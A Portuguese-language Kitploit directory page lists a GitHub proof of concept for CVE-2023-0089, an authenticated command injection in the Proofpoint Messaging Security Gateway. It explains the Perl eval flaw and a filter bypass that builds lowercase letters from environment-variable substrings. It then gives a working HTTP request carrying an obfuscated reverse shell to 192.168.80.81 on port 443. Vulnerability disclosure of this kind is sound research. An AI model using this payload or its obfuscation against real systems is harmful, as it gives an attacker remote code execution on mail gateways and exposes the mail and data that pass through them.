Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/ly1g3/proofpoint-cve-2023-0089
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e ControleDesenvolvimento de Payloads
GitHubly1g3/proofpoint-cve-2023-0089

proofpoint-CVE-2023-0089

Proofpoint Email Gateway: Do usuário autenticado de baixo nível para administrador RCE

Ver Repositório
11há 2 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Sobre

Pesquisador de segurança: ly1g3, ly1g3[at]tuta.io

GPG fingerprint: https://keys.openpgp.org/vks/v1/by-fingerprint/5FE85CE4E8F675F5ABD2C0A33CE8BE447ED6D586

Resumo: Execução Remota de Código - Usuário autenticado de baixo nível para RCE de administrador

CVE: CVE-2023-0089

Cronograma:

  • Descoberto - ly1g3
  • Reportado - ly1g3
  • Corrigido - Proofpoint

Proofpoint Messaging Security Gateway 8.18.4.73-8.18.4.73

Exploits para o Proofpoint Messaging Security Gateway

Execução Remota de Código (RCE)

Um usuário autenticado de baixo nível do Euweb pode obter execução arbitrária de código com privilégios de administrador.

Técnico

A função getMsgType no Euwebutils.pm é vulnerável a injeção de comandos. A variável $module vem de um parâmetro GET e nenhuma sanitização é aplicada a essa entrada do usuário.

root@kitploit:~
sub getMsgType {
...
else {
		$msgtype = eval "Proofpoint::Digest::PROOFPOINT_MAIL_REPORT_MSGTYPE_".uc($module);
	}

Esta função getMsgType é usada por muitas chamadas de API usadas pela aplicação Euweb, então o exploit pode ser acionado de várias maneiras.

Como todos os caracteres devem ser maiúsculos, variáveis de ambiente podem ser usadas para contornar essa restrição para letras minúsculas. Exemplo: ${SHELL:1:1} em vez de b

Como use strict é usado, MAIL_GENERAL() pode ser adicionado ao início da string para completar PROOFPOINT_MAIL_REPORT_MSGTYPE_. Depois disso, código perl personalizado pode ser adicionado.

Exemplo de payload não codificado: MAIL_GENERAL();`id`

POC

Reverse shell codificado usando variáveis de ambiente para contornar restrições de letras minúsculas. Código executado como usuário pps.

root@kitploit:~
GET /euweb/euweb?cmd=x_releasemsg&id=0&func=ReleaseMsg&entries=23%3A23%3A12&eid=3&module=MAIL_GENERAL()%3b`/\${SHELL%3a1%3a1}\${SHELL%3a2%3a1}\${LANG%3a1%3a1}/\${USER%3a2%3a1}\${SHELL%3a8%3a1}+-\${SHELL%3a2%3a1}+>%26+/\${SSH_TTY%3a1%3a1}\${TERM%3a2%3a1}\${MAIL%3a1%3a1}/\${TERM%3a1%3a1}\${TERM%3a9%3a1}\${USER%3a0%3a1}/192.168.80.81/443+0>%261`
Baixar ferramenta